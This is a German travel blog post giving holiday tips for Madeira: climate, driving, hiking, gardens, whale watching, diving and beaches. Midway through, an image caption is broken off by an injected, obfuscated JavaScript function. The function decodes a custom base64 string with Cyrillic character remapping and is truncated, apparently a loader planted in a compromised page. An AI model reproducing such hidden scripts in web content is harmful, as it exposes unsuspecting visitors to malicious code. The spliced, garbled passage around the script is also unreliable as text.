Tipps für einen Urlaub auf Madeira

Die Insel Madeira, auch als „Blumeninsel“ bekannt, gehört zu Portugal und liegt 951 Kilometer südwestlich von Lissabon bzw. 737 Kilometer westlich von Marokko im Atlantischen Ozean. Zu jeder Jahreszeit ist die bergige Insel mit ihren abwechslungsreichen Landschaften und ihrer prächtigen Vegetation einen Besuch wert, da sie über ein ganzjährig mildes Klima verfügt. Das Frühjahr und der Sommer stellen jedoch die beste Jahreszeit für eine Reise auf die exotische Insel dar, da es zu jenen Jahreszeiten weniger Niederschläge gibt. Insbesondere begeisterte Schnorchler und Taucher werden an einem Trip auf die portugiesische Insel Freude haben. Aber auch passionierte Wanderer kommen dank der unzähligen Wanderwege mit Sicherheit auf ihre Kosten.

Ausblick im Norden von Madeira (Bild: © Djscho ( Joachim Frewert )  / pixelio.de)
Ausblick im Norden von Madeira (Bild: © Djscho ( Joachim Frewert ) / pixelio.de)

Ausflüge und Aktivitäten

Zur Fortbewegung auf der Insel bieten sich Taxen, Busse und vor allem Mietwagen an. Mit Letzteren kann man die Insel selbstständig bei einer Fahrt auf den in die Felsen geschlagenen Serpentinen mit ihren unzähligen Tunneln erkunden. Auch zu Fuß lassen sich auf Wanderwegen ständig neue atemberaubende Ausblicke wie schroffe Steilküsten, abwechslungsreiche Berglandschaften und üppige Wald- und Pflanzenlandschaften entdecken. Apropos Pflanzen: Ihren Spitznamen "Blumeninsel" hat Madeira ihrer außergewöhnlichen Vegetation mit teils seltenen exotischen

Liebesblumen am Straßenr<script type=
function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand von Madeira (Bild: © Makrodepecher / pixelio.de)" width="300" height="225" />

Pflanzen und Früchten zu verdanken. Zusätzlich zur natürlichen Landschaft haben die Einwohner Parks und Gärten geschaffen, die der inseltypischen Vielfalt in nichts nachstehen. Künstlich angelegte Anlagen wie der Madeira Magic Garden Themenpark, der Parche Muncipal do Monte oder der Jardim Botanico sind auf jeden Fall einen Besuch wert. Da die Küste Madeiras steil in das Meer abfällt, leben hier Delfine, Meeresschildkröten sowie einige Walarten. Beliebt unter Touristen sind daher Touren mit dem Boot, bei denen die Meeresbewohner beobachtet werden können. Überhaupt bieten die Gewässer rund um Madeira eine riesige Artenvielfalt, da sie Ausläufer des warmen Golfstroms bilden. Daher sollten Taucher für den nächsten Urlaub Madeira in Betracht ziehen und schon einmal nach einer Ferienwohnung oder einem Ferienhaus Ausschau halten. Dort können sie Arten wie Papageien- und Kugelfische, Barracudas sowie manchmal auch Mantas beobachten. Tauchbase finden sich in den Orten Funchal, Machico und Canico de Baixo.

Baden auf Madeira

Wer einen reinen Strandurlaub plant, wird auf Madeira wahrscheinlich nicht glücklich. Anstelle von feinsandigen Stränden bietet die Insel dafür aber einzigartige Lavaschwimmbäder, Felsenpools sowie versteckte kleine Buchten mit Kiesel- oder Basaltsandstränden. Künstlich angelegte Strände mit hellem Sand finden sich in den Orten Calheta und Machico. Einen 9 Kilometer langen Sandstrand bietet dafür die Nachbarinsel Porto Santo. Diese lässt sich problemlos per Schiff oder mit dem Flugzeug erreichen. Die Überfahrt mit der Fähre dauert 2 bis 3 Stunden, mit dem Flugzeug ist man hingegen schon in 20 Minuten auf der Nachbarinsel angelangt.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg